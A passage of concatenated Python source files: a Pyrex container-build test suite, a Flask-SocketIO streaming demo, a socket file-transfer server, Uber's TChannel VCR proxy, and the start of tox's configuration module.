class Config(configparser.RawConfigParser):
def write_conf(self):
write_config_helper(self)
def write_config_helper(conf):
with open(self.pyrex_conf, 'w') as f:
conf.write(f)
config = Config()
if os.path.exists(self.pyrex_conf) and not defaults:
config.read(self.pyrex_conf)
else:
config.read_string(pyrex.read_default_config(True))
return config
def assertSubprocess(self, *args, capture=False, returncode=0, **kwargs):
if capture:
try:
output = subprocess.check_output(*args, stderr=subprocess.STDOUT, **kwargs)
except subprocess.CalledProcessError as e:
ret = e.returncode
output = e.output
else:
ret = 0
self.assertEqual(ret, returncode, msg='%s: %s' % (' '.join(*args), output.decode('utf-8')))
return output
else:
with subprocess.Popen(*args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, **kwargs) as proc:
while True:
out = proc.stdout.readline().decode('utf-8')
if not out and proc.poll() is not None:
break
if out:
sys.stdout.write(out)
ret = proc.poll()
self.assertEqual(ret, returncode, msg='%s failed')
return None
def assertPyrexHostCommand(self, *args, quiet_init=False, **kwargs):
cmd_file = os.path.join(self.thread_dir, 'command')
commands = []
commands.append('. ./poky/pyrex-init-build-env%s' % ('', ' > /dev/null')[quiet_init])
commands.extend(list(args))
with open(cmd_file, 'w') as f:
f.write(' && '.join(commands))
return self.assertSubprocess(['/bin/bash', cmd_file], cwd=PYREX_ROOT, **kwargs)
def assertPyrexContainerShellCommand(self, *args, **kwargs):
cmd_file = os.path.join(self.thread_dir, 'container_command')
with open(cmd_file, 'w') as f:
f.write(' && '.join(args))
return self.assertPyrexHostCommand('pyrex-shell %s' % cmd_file, **kwargs)
def assertPyrexContainerCommand(self, cmd, **kwargs):
return self.assertPyrexHostCommand('pyrex-run %s' % cmd, **kwargs)
class PyrexCore(PyrexTest):
def test_init(self):
self.assertPyrexHostCommand('true')
def test_bitbake_parse(self):
self.assertPyrexHostCommand('bitbake -p')
def test_pyrex_shell(self):
self.assertPyrexContainerShellCommand('exit 3', returncode=3)
def test_pyrex_run(self):
self.assertPyrexContainerCommand('/bin/false', returncode=1)
def test_disable_pyrex(self):
# Capture our cgroups
with open('/proc/self/cgroup', 'r') as f:
cgroup = f.read()
pyrex_cgroup_file = os.path.join(self.thread_dir, 'pyrex_cgroup')
# Capture cgroups when pyrex is enabled
self.assertPyrexContainerShellCommand('cat /proc/self/cgroup > %s' % pyrex_cgroup_file)
with open(pyrex_cgroup_file, 'r') as f:
pyrex_cgroup = f.read()
self.assertNotEqual(cgroup, pyrex_cgroup)
env = os.environ.copy()
env['PYREX_DOCKER'] = '0'
self.assertPyrexContainerShellCommand('cat /proc/self/cgroup > %s' % pyrex_cgroup_file, env=env)
with open(pyrex_cgroup_file, 'r') as f:
pyrex_cgroup = f.read()
self.assertEqual(cgroup, pyrex_cgroup)
def test_quiet_build(self):
env = os.environ.copy()
env['PYREX_DOCKER_BUILD_QUIET'] = '1'
self.assertPyrexHostCommand('true', env=env)
def test_no_docker_build(self):
# Prevent docker from working
os.symlink('/bin/false', os.path.join(self.bin_dir, 'docker'))
# Docker will fail if invoked here
env = os.environ.copy()
env['PYREX_DOCKER'] = '0'
self.assertPyrexHostCommand('true', env=env)
# Verify that pyrex won't allow you to try and use docker later
output = self.assertPyrexHostCommand('PYREX_DOCKER=1 bitbake', returncode=1, capture=True, env=env).decode('utf-8')
self.assertIn('Docker was not enabled when the environment was setup', output)
def test_bad_docker(self):
# Prevent docker from working
os.symlink('/bin/false', os.path.join(self.bin_dir, 'docker'))
# Verify that attempting to run build pyrex without docker shows the
# installation instructions
output = self.assertPyrexHostCommand('true', returncode=1, capture=True).decode('utf-8')
self.assertIn('Unable to run', output)
def test_ownership(self):
# Test that files created in docker are the same UID/GID as the user
# running outside
test_file = os.path.join(self.thread_dir, 'ownertest')
if os.path.exists(test_file):
os.unlink(test_file)
self.assertPyrexContainerShellCommand('echo "$(id -un):$(id -gn)" > %s' % test_file)
s = os.stat(test_file)
self.assertEqual(s.st_uid, os.getuid())
self.assertEqual(s.st_gid, os.getgid())
with open(test_file, 'r') as f:
(username, groupname) = f.read().rstrip().split(':')
self.assertEqual(username, pwd.getpwuid(os.getuid()).pw_name)
self.assertEqual(groupname, grp.getgrgid(os.getgid()).gr_name)
def test_owner_env(self):
# This test is primarily designed to ensure that everything is passed
# correctly through 'pyrex run'
conf = self.get_config()
# Note: These config variables are intended for testing use only
conf['run']['uid'] = '1337'
conf['run']['gid'] = '7331'
conf['run']['username'] = 'theuser'
conf['run']['groupname'] = 'thegroup'
conf['run']['initcommand'] = ''
conf.write_conf()
# Make a fifo that the container can write into. We can't just write a
# file because it won't be owned by running user and thus can't be
# cleaned up
old_umask = os.umask(0)
self.addCleanup(os.umask, old_umask)
fifo = os.path.join(self.thread_dir, 'fifo')
os.mkfifo(fifo)
self.addCleanup(os.remove, fifo)
os.umask(old_umask)
output = []
def read_fifo():
nonlocal output
with open(fifo, 'r') as f:
output = f.readline().rstrip().split(':')
thread = threading.Thread(target=read_fifo)
thread.start()
try:
self.assertPyrexContainerShellCommand('echo "$(id -u):$(id -g):$(id -un):$(id -gn):$USER:$GROUP" > %s' % fifo)
finally:
thread.join()
self.assertEqual(output[0], '1337')
self.assertEqual(output[1], '7331')
self.assertEqual(output[2], 'theuser')
self.assertEqual(output[3], 'thegroup')
self.assertEqual(output[4], 'theuser')
self.assertEqual(output[5], 'thegroup')
def test_duplicate_binds(self):
temp_dir = tempfile.mkdtemp('-pyrex')
self.addCleanup(shutil.rmtree, temp_dir)
conf = self.get_config()
conf['run']['bind'] += ' %s %s' % (temp_dir, temp_dir)
conf.write_conf()
self.assertPyrexContainerShellCommand('true')
def test_bad_confversion(self):
# Verify that a bad config is an error
conf = self.get_config()
conf['config']['confversion'] = '0'
conf.write_conf()
self.assertPyrexHostCommand('true', returncode=1)
def test_conftemplate_ignored(self):
# Write out a template with a bad version in an alternate location. It
# should be ignored
temp_dir = tempfile.mkdtemp('-pyrex')
self.addCleanup(shutil.rmtree, temp_dir)
conftemplate = os.path.join(temp_dir, 'pyrex.ini.sample')
conf = self.get_config(defaults=True)
conf['config']['confversion'] = '0'
with open(conftemplate, 'w') as f:
conf.write(f)
self.assertPyrexHostCommand('true')
def test_conf_upgrade(self):
conf = self.get_config()
del conf['config']['confversion']
conf.write_conf()
# Write out a template in an alternate location. It will be respected
temp_dir = tempfile.mkdtemp('-pyrex')
self.addCleanup(shutil.rmtree, temp_dir)
conftemplate = os.path.join(temp_dir, 'pyrex.ini.sample')
conf = self.get_config(defaults=True)
if self.test_image:
conf['config']['pyreximage'] = self.test_image
with open(conftemplate, 'w') as f:
conf.write(f)
env = os.environ.copy()
env['PYREXCONFTEMPLATE'] = conftemplate
self.assertPyrexHostCommand('true', env=env)
def test_bad_conf_upgrade(self):
# Write out a template in an alternate location, but it also fails to
# have a confversion
conf = self.get_config()
del conf['config']['confversion']
conf.write_conf()
# Write out a template in an alternate location. It will be respected
temp_dir = tempfile.mkdtemp('-pyrex')
self.addCleanup(shutil.rmtree, temp_dir)
conftemplate = os.path.join(temp_dir, 'pyrex.ini.sample')
conf = self.get_config(defaults=True)
if self.test_image:
conf['config']['pyreximage'] = self.test_image
del conf['config']['confversion']
with open(conftemplate, 'w') as f:
conf.write(f)
env = os.environ.copy()
env['PYREXCONFTEMPLATE'] = conftemplate
self.assertPyrexHostCommand('true', returncode=1, env=env)
class TestImage(PyrexTest):
def test_tini(self):
self.assertPyrexContainerCommand('tini --version')
def test_icecc(self):
self.assertPyrexContainerCommand('icecc --version')
def test_guest_image(self):
# This test makes sure that the image being tested is the image we
# actually expect to be testing
if not self.test_image:
self.skipTest("%s not defined" % TEST_IMAGE_ENV_VAR)
dist_id_str = self.assertPyrexContainerCommand('lsb_release -i', quiet_init=True, capture=True).decode('utf-8').rstrip()
release_str = self.assertPyrexContainerCommand('lsb_release -r', quiet_init=True, capture=True).decode('utf-8').rstrip()
self.assertRegex(dist_id_str.lower(), r'^distributor id:\s+' + re.escape(self.test_image.split('-', 1)[0]))
self.assertRegex(release_str.lower(), r'^release:\s+' + re.escape(self.test_image.split('-', 1)[1]))
if __name__ == "__main__":
unittest.main()
|
ts_burst_example.py
|
#Copyright (c) 2017 Joseph D. Steinmeyer (jodalyst)
#Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished to do so, subject
# to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies
# or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
#questions? email me at jodalyst@mit.edu
import time
import math
from threading import Thread, Lock
from flask import Flask, render_template, session, request
from flask_socketio import SocketIO, emit, join_room, leave_room,close_room, rooms, disconnect
# Set this variable to "threading", "eventlet" or "gevent" to test the
# different async modes, or leave it set to None for the application to choose
# the best option based on available packages.
#async_mode = 'threading'
#async_mode = 'eventlet'
async_mode = None
if async_mode is None:
try:
import eventlet
async_mode = 'eventlet'
except ImportError:
pass
if async_mode is None:
try:
from gevent import monkey
async_mode = 'gevent'
except ImportError:
pass
if async_mode is None:
async_mode = 'threading'
print('async_mode is ' + async_mode)
# monkey patching is necessary because this application uses a background
# thread
if async_mode == 'eventlet':
import eventlet
eventlet.monkey_patch()
elif async_mode == 'gevent':
from gevent import monkey
monkey.patch_all()
#Start up Flask server:
app = Flask(__name__, template_folder = './',static_url_path='/static')
app.config['SECRET_KEY'] = 'secret!' #shhh don't tell anyone. Is a secret
socketio = SocketIO(app, async_mode = async_mode)
thread = None
def dataThread():
unique = 456
amp1 = 50
amp2 = 12
ampo1 = amp1
ampo2 = amp2
omega1 = 10
omega2 = 30
set1 = []
set2 =[]
burst_duration = 1
counter = 0
on_state = True
toggle_count = 500
while True:
set1.append(ampo1*math.sin(omega1*time.time()))
set2.append(ampo2*math.sin(omega2*time.time()))
counter +=1
if counter%burst_duration == 0:
socketio.emit('update_{}'.format(unique),[set1,set2],broadcast =True)
set1 = []
set2 = []
#print('sending')
if counter%toggle_count == 0:
counter = 0
if on_state:
ampo1 = 0
ampo2 = 0
print("OFF")
else:
ampo1 = amp1
ampo2 = amp2
print("ON")
on_state = not on_state
time.sleep(0.01)
@app.route('/')
def index():
global thread
print ("A user connected")
if thread is None:
thread = Thread(target=dataThread)
thread.daemon = True
thread.start()
return render_template('time_series_example.html')
if __name__ == '__main__':
socketio.run(app, port=3000, debug=True)
|
send_file.py
|
import socket
import json
import struct
import os
import hashlib
import multiprocessing
file_path = './send/Windows.iso'
file_name = os.path.basename(file_path)
def transmit(cnn, addr, file_info):
print(str(addr) + ' Connected')
try:
file_size = file_info['file_size']
header_bytes = json.dumps(file_info).encode()
transmit_size = 0
cnn.send(struct.pack('I', len(header_bytes)))
cnn.recv(1024)
cnn.send(header_bytes)
with open(file_path, 'rb') as f:
print(str(addr) + ' Sending ' + str(file_size) + ' bytes...')
while True:
send_data = f.read(16384)
if not send_data:
break
cnn.send(send_data)
transmit_size += len(send_data)
except Exception as e:
print(str(addr) + ' Disconnected')
finally:
print(str(addr) + ' Done. ' + str(transmit_size) + ' bytes transmitted.')
cnn.close()
if __name__ == "__main__":
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 23333 ))
s.listen(5)
print('Starting service for {} ...'.format(file_name))
file_size = os.path.getsize(file_path)
print('File size: {} bytes'.format(str(file_size)))
with open(file_path, 'rb') as f:
file_hash = hashlib.md5()
'''
while chunk := f.read(16384):
file_hash.update(chunk)
'''
while True:
chunk = f.read(16384)
if not chunk:
break
file_hash.update(chunk)
file_hash = file_hash.hexdigest()
print('File hash: {}'.format(file_hash))
header = {
'file_name': file_name,
'file_size': file_size,
'file_hash': file_hash
}
print('Service started')
while True:
try:
cnn, addr = s.accept()
m = multiprocessing.Process(target=transmit, args=(cnn, addr, header,))
m.daemon = True
m.start()
except Exception as e:
print(e)
|
server.py
|
# Copyright (c) 2016 Uber Technologies, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import absolute_import
import six
import sys
import random
import threading
from functools import wraps
import traceback
from concurrent.futures import Future as ConcFuture
from tornado import gen
from tornado.ioloop import IOLoop
from tchannel.errors import TChannelError
from tchannel import TChannel
from . import proxy
def wrap_uncaught(func=None, reraise=None):
"""Catches uncaught exceptions and raises VCRServiceErrors instead.
:param reraise:
Collection of exception clasess that should be re-raised as-is.
"""
reraise = reraise or ()
def decorator(f):
@wraps(f)
@gen.coroutine
def new_f(*args, **kwargs):
try:
result = yield gen.maybe_future(f(*args, **kwargs))
except Exception as e:
if any(isinstance(e, cls) for cls in reraise):
raise e
raise proxy.VCRServiceError(str(e) +
' ' + traceback.format_exc())
else:
raise gen.Return(result)
return new_f
if func is not None:
return decorator(func)
else:
return decorator
class VCRProxyService(object):
def __init__(self, cassette, unpatch):
"""
:param unpatch:
A function returning a context manager which temporarily unpatches
any monkey patched code so that a real request can be made.
:param cassette:
Cassette being played.
"""
self.unpatch = unpatch
self.cassette = cassette
self.io_loop = None
self.thread = None
self.tchannel = None
self._running = ConcFuture()
@wrap_uncaught(reraise=(
proxy.CannotRecordInteractionsError,
proxy.NoPeersAvailableError,
proxy.RemoteServiceError,
proxy.VCRServiceError,
))
@gen.coroutine
def send(self, request):
cassette = self.cassette
request = request.body.request
# TODO decode requests and responses based on arg scheme into more
# readable formats.
# Because Thrift doesn't handle UTF-8 correctly right now
if isinstance(request.serviceName, bytes):
request.serviceName = request.serviceName.decode('utf-8')
if isinstance(request.endpoint, bytes):
request.endpoint = request.endpoint.decode('utf-8')
# TODO do we care about hostport being the same?
if cassette.can_replay(request):
vcr_response = cassette.replay(request)
raise gen.Return(vcr_response)
if cassette.write_protected:
raise proxy.CannotRecordInteractionsError(
'Could not find a matching response for request %s and the '
'record mode %s prevents new interactions from being '
'recorded. Your test may be performing an unexpected '
'request.' % (str(request), cassette.record_mode)
)
peers = []
if request.hostPort:
peers = [request.hostPort]
else:
peers = request.knownPeers
if not peers:
raise proxy.NoPeersAvailableError(
'Could not find a recorded response for request %s and was '
'unable to make a new request because both, hostPort and '
'knownPeers were unspecified. One of them must be specified '
'for me to make new requests. Make sure you specified a '
'hostport in the original request or are advertising '
'on Hyperbahn.' % (str(request),)
)
arg_scheme = proxy.ArgScheme.name_of(request.argScheme).lower()
with self.unpatch():
# TODO propagate other request and response parameters
# TODO might make sense to tag all VCR requests with a protocol
# header of some kind
response_future = self.tchannel._dep_tchannel.request(
service=request.serviceName,
arg_scheme=arg_scheme,
hostport=random.choice(peers),
).send(
request.endpoint,
request.headers,
request.body,
headers={h.key: h.value for h in request.transportHeaders},
)
# Don't actually yield while everything is unpatched.
try:
response = yield response_future
except TChannelError as e:
raise proxy.RemoteServiceError(
code=e.code,
message=str(e),
traceback=traceback.format_exc()
)
response_headers = yield response.get_header()
response_body = yield response.get_body()
vcr_response = proxy.Response(
code=response.status_code,
headers=response_headers,
body=response_body,
)
cassette.record(request, vcr_response)
raise gen.Return(vcr_response)
@property
def hostport(self):
return self.tchannel.hostport
def _run(self):
self.io_loop = IOLoop()
self.io_loop.make_current()
self.tchannel = TChannel('proxy-server')
# Hack around legacy TChannel
from tchannel.thrift import rw as thriftrw
thriftrw.register(
self.tchannel._dep_tchannel._handler,
proxy.VCRProxy,
handler=self.send,
)
try:
self.tchannel.listen()
self._running.set_result(None)
except Exception as e:
if six.PY2:
self._running.set_exception_info(*sys.exc_info()[1:])
if six.PY3:
self._running.set_exception(e)
else:
self.io_loop.start()
def start(self):
self.thread = threading.Thread(target=self._run)
self.thread.start()
self._running.result(1) # seconds
def stop(self):
self.tchannel._dep_tchannel.close()
self.tchannel = None
self.io_loop.stop()
self.io_loop = None
self.thread.join(1) # seconds
self.thread = None
def __enter__(self):
self.start()
return self
def __exit__(self, *args):
self.stop()
|
__init__.py
|
from __future__ import print_function
import argparse
import itertools
import os
import random
import re
import shlex
import string
import sys
import traceback
import warnings
from collections import OrderedDict
from fnmatch import fnmatchcase
from subprocess import list2cmdline
from threading import Thread
import pluggy
import py
import toml
from packaging import requirements
from packaging.utils import canonicalize_name
import tox
from tox.constants import INFO
from tox.exception import MissingDependency
from tox.interpreters import Interpreters, NoInterpreterInfo
from tox.reporter import (
REPORTER_TIMESTAMP_ON_ENV,
error,
update_default_reporter,
using,
verbosity1,
)
from tox.util.path import ensure_empty_dir
from tox.util.stdlib import importlib_metadata
from .parallel import ENV_VAR_KEY_PRIVATE as PARALLEL_ENV_VAR_KEY_PRIVATE
from .parallel import ENV_VAR_KEY_PUBLIC as PARALLEL_ENV_VAR_KEY_PUBLIC
from .parallel import add_parallel_config, add_parallel_flags
from .reporter import add_verbosity_commands
try:
from shlex import quote as shlex_quote
except ImportError:
from pipes import quote as shlex_quote
hookimpl = tox.hookimpl
# DEPRECATED - REMOVE - left for compatibility with plugins importing from here.
# Import hookimpl directly from tox instead.
WITHIN_PROVISION = os.environ.get(str("TOX_PROVISION")) == "1"
SUICIDE_TIMEOUT = 0.0
INTERRUPT_TIMEOUT = 0.3
TERMINATE_TIMEOUT = 0.2
_FACTOR_LINE_PATTERN = re.compile(r"^([\w{}\.!,-]+)\:\s+(.+)")
_ENVSTR_SPLIT_PATTERN = re.compile(r"((?:\{[^}]+\})+)|,")
_ENVSTR_EXPAND_PATTERN = re.compile(r"\{([^}]+)\}")
_WHITESPACE_PATTERN = re.compile(r"\s+")
def get_plugin_manager(plugins=()):
# initialize plugin manager
import tox.venv
pm = pluggy.PluginManager("tox")
pm.add_hookspecs(tox.hookspecs)
pm.register(tox.config)
pm.register(tox.interpreters)
pm.register(tox.venv)
pm.register(tox.session)
from tox import package
pm.register(package)
pm.load_setuptools_entrypoints("tox")
for plugin in plugins:
pm.register(plugin)
pm.check_pending()
return pm
class Parser:
"""Command line and ini-parser control object."""
def __init__(self):
class HelpFormatter(argparse.ArgumentDefaultsHelpFormatter):
def __init__(self, prog):
super(HelpFormatter, self).__init__(prog, max_help_position=35, width=190)
self.argparser = argparse.ArgumentParser(
description="tox options", add_help=False, prog="tox", formatter_class=HelpFormatter,
)
self._testenv_attr = []
def add_argument(self, *args, **kwargs):
""" add argument to command line parser. This takes the
same arguments that ``argparse.ArgumentParser.add_argument``.
"""
return self.argparser.add_argument(*args, **kwargs)
def add_testenv_attribute(self, name, type, help, default=None, postprocess=None):
""" add an ini-file variable for "testenv" section.
Types are specified as strings like "bool", "line-list", "string", "argv", "path",
"argvlist".
The ``postprocess`` function will be called for each testenv
like ``postprocess(testenv_config=testenv_config, value=value)``
where ``value`` is the value as read from the ini (or the default value)
and ``testenv_config`` is a :py:class:`tox.config.TestenvConfig` instance
which will receive all ini-variables as object attributes.
Any postprocess function must return a value which will then be set
as the final value in the testenv section.
"""
self._testenv_attr.append(VenvAttribute(name, type, default, help, postprocess))
def add_testenv_attribute_obj(self, obj):
""" add an ini-file variable as an object.
This works as the ``add_testenv_attribute`` function but expects
"name", "type", "help", and "postprocess" attributes on the object.
"""
assert hasattr(obj, "name")
assert hasattr(obj, "type")
assert hasattr(obj, "help")
assert hasattr(obj, "postprocess")
self._testenv_attr.append(obj)
def parse_cli(self, args, strict=False):
args, argv = self.argparser.parse_known_args(args)
if argv and (strict or WITHIN_PROVISION):
self.argparser.error("unrecognized arguments: {}".format(" ".join(argv)))
return args
def _format_help(self):
return self.argparser.format_help()
class VenvAttribute:
def __init__(self, name, type, default, help, postprocess):
self.name = name
self.type = type
self.default = default
self.help = help
self.postprocess = postprocess
class DepOption:
name = "deps"
type = "line-list"
help = "each line specifies a dependency in pip/setuptools format."
default = ()
def postprocess(self, testenv_config, value):
deps = []
config = testenv_config.config
for depline in value:
m = re.match(r":(\w+):\s*(\S+)", depline)
if m:
iname, name = m.groups()
ixserver = config.indexserver[iname]
else:
name = depline.strip()
ixserver = None
# we need to process options, in case they contain a space,
# as the subprocess call to pip install will otherwise fail.
# in case of a short option, we remove the space
for option in tox.PIP.INSTALL_SHORT_OPTIONS_ARGUMENT:
if name.startswith(option):
name = "{}{}".format(option, name[len(option) :].strip())
# in case of a long option, we add an equal sign
for option in tox.PIP.INSTALL_LONG_OPTIONS_ARGUMENT:
name_start = "{} ".format(option)
if name.startswith(name_start):
name = "{}={}".format(option, name[len(option) :].strip())
name = self._cut_off_dep_comment(name)
name = self._replace_forced_dep(name, config)
deps.append(DepConfig(name, ixserver))
return deps
def _replace_forced_dep(self, name, config):
"""Override given dependency config name. Take ``--force-dep-version`` option into account.
:param name: dep config, for example ["pkg==1.0", "other==2.0"].
:param config: ``Config`` instance
:return: the new dependency that should be used for virtual environments
"""
if not config.option.force_dep:
return name
for forced_dep in config.option.force_dep:
if self._is_same_dep(forced_dep, name):
return forced_dep
return name
@staticmethod
def _cut_off_dep_comment(name):
return re.sub(r"\s+#.*", "", name).strip()
@classmethod
def _is_same_dep(cls, dep1, dep2):
"""Definitions are the same if they refer to the same package, even if versions differ."""
dep1_name = canonicalize_name(requirements.Requirement(dep1).name)
try:
dep2_name = canonicalize_name(requirements.Requirement(dep2).name)
except requirements.InvalidRequirement:
# we couldn't parse a version, probably a URL
return False
return dep1_name == dep2_name
class PosargsOption:
name = "args_are_paths"
type = "bool"
default = True
help = "treat positional args in commands as paths"
def postprocess(self, testenv_config, value):
config = testenv_config.config
args = config.option.args
if args:
if value:
args = []
for arg in config.option.args:
if arg and not os.path.isabs(arg):
origpath = os.path.join(config.invocationcwd.strpath, arg)
if os.path.exists(origpath):
arg = os.path.relpath(origpath, testenv_config.changedir.strpath)
args.append(arg)
testenv_config._reader.addsubstitutions(args)
return value
class InstallcmdOption:
name = "install_command"
type = "argv"
default = "python -m pip install {opts} {packages}"
help = "install command for dependencies and package under test."
def postprocess(self, testenv_config, value):
if "{packages}" not in value:
raise tox.exception.ConfigError(
"'install_command' must contain '{packages}' substitution",
)
return value
def parseconfig(args, plugins=()):
"""Parse the configuration file and create a Config object.
:param plugins:
:param list[str] args: list of arguments.
:rtype: :class:`Config`
:raise SystemExit: toxinit file is not found
"""
pm = get_plugin_manager(plugins)
config, option = parse_cli(args, pm)
update_default_reporter(config.option.quiet_level, config.option.verbose_level)
for config_file in propose_configs(option.configfile):
config_type = config_file.basename
content = None
if config_type == "pyproject.toml":
toml_content = get_py_project_toml(config_file)
try:
content = toml_content["tool"]["tox"]["legacy_tox_ini"]
except KeyError:
continue
ParseIni(config, config_file, content)
pm.hook.tox_configure(config=config) # post process config object
break
else:
parser = Parser()
pm.hook.tox_addoption(parser=parser)
# if no tox config file, now we need do a strict argument evaluation
# raise on unknown args
parser.parse_cli(args, strict=True)
if option.help or option.helpini:
return config
msg = "tox config file (either {}) not found"
candidates = ", ".join(INFO.CONFIG_CANDIDATES)
feedback(msg.format(candidates), sysexit=not (option.help or option.helpini))
return config
def get_py_project_toml(path):
with open(str(path)) as file_handler:
config_data = toml.load(file_handler)
return config_data
def propose_configs(cli_config_file):
from_folder = py.path.local()
if cli_config_file is not None:
if os.path.isfile(cli_config_file):
yield py.path.local(cli_config_file)
return
if os.path.isdir(cli_config_file):
from_folder = py.path.local(cli_config_file)
else:
print(
"ERROR: {} is neither file or directory".format(cli_config_file), file=sys.stderr,
)
return
for basename in INFO.CONFIG_CANDIDATES:
if from_folder.join(basename).isfile():
yield from_folder.join(basename)
for path in from_folder.parts(reverse=True):
ini_path = path.join(basename)
if ini_path.check():
yield ini_path
def parse_cli(args, pm):
parser = Parser()
pm.hook.tox_addoption(parser=parser)
option = parser.parse_cli(args)
if option.version:
print(get_version_info(pm))
raise SystemExit(0)
interpreters = Interpreters(hook=pm.hook)
config = Config(
pluginmanager=pm, option=option, interpreters=interpreters, parser=parser, args=args,
)
return config, option
def feedback(msg, sysexit=False):
print("ERROR: {}".format(msg), file=sys.stderr)
if sysexit:
raise SystemExit(1)
def get_version_info(pm):
out = ["{} imported from {}".format(tox.__version__, tox.__file__)]
plugin_dist_info = pm.list_plugin_distinfo()
if plugin_dist_info:
out.append("registered plugins:")
for mod, egg_info in plugin_dist_info:
source = getattr(mod, "__file__", repr(mod))
out.append(" {}-{} at {}".format(egg_info.project_name, egg_info.version, source))
return "\n".join(out)
class SetenvDict(object):
_DUMMY = object()
def __init__(self, definitions, reader):
self.definitions = definitions
self.reader = reader
self.resolved = {}
self._lookupstack = []
def __repr__(self):
return "{}: {}".format(self.__class__.__name__, self.definitions)
def __contains__(self, name):
return name in self.definitions
def get(self, name, default=None):
try:
return self.resolved[name]
except KeyError:
try:
if name in self._lookupstack:
raise KeyError(name)
val = self.definitions[name]
except KeyError:
return os.environ.get(name, default)
self._lookupstack.append(name)
try:
self.resolved[name] = res = self.reader._replace(val)
finally:
self._lookupstack.pop()
return res
def __getitem__(self, name):
x = self.get(name, self._DUMMY)
if x is self._DUMMY:
raise KeyError(name)
return x
def keys(self):
return self.definitions.keys()
def __setitem__(self, name, value):
self.definitions[name] = value
self.resolved[name] = value
@tox.hookimpl
def tox_addoption(parser):
parser.add_argument(
"--version", action="store_true", help="report version information to stdout.",
)
parser.add_argument("-h", "--help", action="store_true", help="show help about options")
parser.add_argument(
"--help-ini",
"--hi",
action="store_true",
dest="helpini",
help="show help about ini-names",
)
add_verbosity_commands(parser)
parser.add_argument(
"--showconfig",
action="store_true",
help="show live configuration (by default all env, with -l only default targets,"
" specific via TOXENV/-e)",
)
parser.add_argument(
"-l",
"--listenvs",
action="store_true",
help="show list of test environments (with description if verbose)",
)
parser.add_argument(
"-a",
"--listenvs-all",
action="store_true",
help="show list of all defined environments (with description if verbose)",
)
parser.add_argument(
"-c", dest="configfile", help="config file name or directory with 'tox.ini' file.",
)
parser.add_argument(
"-e",
action="append",
dest="env",
metavar="envlist",
help="work against specified environments (ALL selects all).",
)
parser.add_argument(
"--devenv",
metavar="ENVDIR",
help=(
"sets up a development environment at ENVDIR based on the env's tox "
"configuration specified by `-e` (-e defaults to py)."
),
)
parser.add_argument("--notest", action="store_true", help="skip invoking test commands.")
parser.add_argument(
"--sdistonly", action="store_true", help="only perform the sdist packaging activity.",
)
parser.add_argument(
"--skip-pkg-install", action="store_true", help="skip package installation for this run",
)
add_parallel_flags(parser)
parser.add_argument(
"--parallel--safe-build",
action="store_true",
dest="parallel_safe_build",
help="(deprecated) ensure two tox builds can run in parallel "
"(uses a lock file in the tox workdir with .lock extension)",
)
parser.add_argument(
"--installpkg",
metavar="PATH",
help="use specified package for installation into venv, instead of creating an sdist.",
)
parser.add_argument(
"--develop",
action="store_true",
help="install package in the venv using 'setup.py develop' via 'pip -e .'",
)
parser.add_argument(
"-i",
"--index-url",
action="append",
dest="indexurl",
metavar="URL",
help="set indexserver url (if URL is of form name=url set the "
"url for the 'name' indexserver, specifically)",
)
parser.add_argument(
"--pre",
action="store_true",
help="install pre-releases and development versions of dependencies. "
"This will pass the --pre option to install_command "
"(pip by default).",
)
parser.add_argument(
"-r", "--recreate", action="store_true", help="force recreation of virtual environments",
)
parser.add_argument(
"--result-json",
dest="resultjson",
metavar="PATH",
help="write a json file with detailed information "
"about all commands and results involved.",
)
parser.add_argument(
"--discover",
dest="discover",
nargs="+",
metavar="PATH",
help="for python discovery first try the python executables under these paths",
default=[],
)
# We choose 1 to 4294967295 because it is the range of PYTHONHASHSEED.
parser.add_argument(
"--hashseed",
metavar="SEED",
help="set PYTHONHASHSEED to SEED before running commands. "
"Defaults to a random integer in the range [1, 4294967295] "
"([1, 1024] on Windows). "
"Passing 'noset' suppresses this behavior.",
)
parser.add_argument(
"--force-dep",
action="append",
metavar="REQ",
help="Forces a certain version of one of the dependencies "
"when configuring the virtual environment. REQ Examples "
"'pytest<2.7' or 'django>=1.6'.",
)
parser.add_argument(
"--sitepackages",
action="store_true",
help="override sitepackages setting to True in all envs",
)
parser.add_argument(
"--alwayscopy",
action="store_true",
help="override alwayscopy setting to True in all envs",
)
cli_skip_missing_interpreter(parser)
parser.add_argument("--workdir", metavar="PATH", help="tox working directory")
parser.add_argument(
"args",
nargs="*",
help="additional arguments available to command positional substitution",
)
def _set_envdir_from_devenv(testenv_config, value):
if testenv_config.config.option.devenv is not None:
return py.path.local(testenv_config.config.option.devenv)
else:
return value
parser.add_testenv_attribute(
name="envdir",
type="path",
